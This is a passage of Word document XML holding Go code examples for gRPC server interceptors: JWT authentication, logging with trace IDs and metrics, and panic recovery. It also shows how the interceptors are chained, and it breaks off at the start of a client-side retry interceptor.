    <w:p w14:paraId="004B4F5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    info *grpc.UnaryServerInfo,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64308F34" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    handler grpc.UnaryHandler,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F2B7BA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>) (interface{}, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7F29C5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Extract JWT from metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1872442F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    md, ok := metadata.FromIncomingContext(ctx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AE7BD7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    if !ok {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD1CCDC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        return nil, status.Error(codes.Unauthenticated, "missing metadata")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DACE12C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C47393C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536BB459" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    tokens := md.Get("authorization")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F2966B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    if len(tokens) == 0 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268169C7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        return nil, status.Error(codes.Unauthenticated, "missing authorization header")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC3C824" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE1E68A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775637B0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    token := strings.TrimPrefix(tokens[0], "Bearer ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A34902" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    claims, err := validateJWT(token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3034A51F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF7678" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        return nil, status.Errorf(codes.Unauthenticated, "invalid token: %v", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C60BC20" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061DEC13" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F63D37" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Add user info to context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3597362E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ctx = context.WithValue(ctx, userClaimsKey, claims)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05065C54" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6010BF48" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    // Call next handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8712E8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    return handler(ctx, req)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ED41BF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460012C7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="0BDD46B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Logging interceptor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EDCB71" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>func LoggingInterceptor(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A29168" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ctx context.Context,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B11713" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    req interface{},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECF1B02" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    info *grpc.UnaryServerInfo,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4BCCCE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    handler grpc.UnaryHandler,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FCD3B4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>) (interface{}, error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66526433" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    start := time.Now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DAE122" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FB7858" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Extract trace ID from context (OpenTelemetry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E449B23" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    span := trace.SpanFromContext(ctx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29009663" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    traceID := span.SpanContext().TraceID().String()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1696136F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16743709" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    resp, err := handler(ctx, req)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0370001B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC0C93F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    duration := time.Since(start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F573FE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    code := status.Code(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736FA5B8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D358ADE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    log.Info("gRPC request",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1D266A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        "method", info.FullMethod,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B577A17" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        "duration_ms", duration.Milliseconds(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F38612" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        "status_code", code,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6B1F7C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "trace_id", traceID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA37B56" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        "error", err,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBF8148" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CFAEB3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6DF97F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Emit metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09094944" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpcRequestDuration.WithLabelValues(info.FullMethod, code.String()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444C7E29" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        Observe(duration.Seconds())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4590B72C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCFE960" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    return resp, err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5238F246" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB33E92" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="10744A66" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Recovery interceptor (panic handler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5856D922" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>func RecoveryInterceptor(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D4E264" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ctx context.Context,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFDE586" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    req interface{},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5B45A8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    info *grpc.UnaryServerInfo,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8C212A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    handler grpc.UnaryHandler,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE107A5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>) (resp interface{}, err error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEF3868" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    defer func() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5753C419" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        if r := recover(); r != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4396D683" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            log.Error("panic in gRPC handler",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB03ADB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                "method", info.FullMethod,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCEA02D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                "panic", r,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E3B62B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                "stack", debug.Stack(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED03E99" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FE6F84" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            err = status.Errorf(codes.Internal, "internal server error")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D08DF36" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386806AA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D47EC1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    return handler(ctx, req)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380F612B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410F8B28" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="0C5A63E3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Chain interceptors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B6B397" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>server := grpc.NewServer(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36145D35" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc.ChainUnaryInterceptor(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46487A52" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        RecoveryInterceptor,    // outermost: catches panics in other interceptors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658971E1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        AuthInterceptor,        // auth before logging (don't log unauthenticated requests)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E2B9A0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        LoggingInterceptor,     // log after auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F816C0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        TracingInterceptor,     // OpenTelemetry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108DA59C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        ValidationInterceptor,  // validate request before handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25170DB1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007505BD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpc.ChainStreamInterceptor(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2469CD3F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        StreamRecoveryInterceptor,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F3BC76" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        StreamAuthInterceptor,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6691C049" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        StreamLoggingInterceptor,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008AA8AC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627578BE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA5FBF2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client-side interceptors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBF5FF0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D038AE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Retry interceptor (with exponential backoff)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1B316B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>func RetryInterceptor(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A43B747" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ctx context.Context,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DAFDBB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    method string,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4644A7BB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    req, reply interface{},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E37EA2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    cc *grpc.ClientConn,</w:t>
      </w:r>
    </w:p>
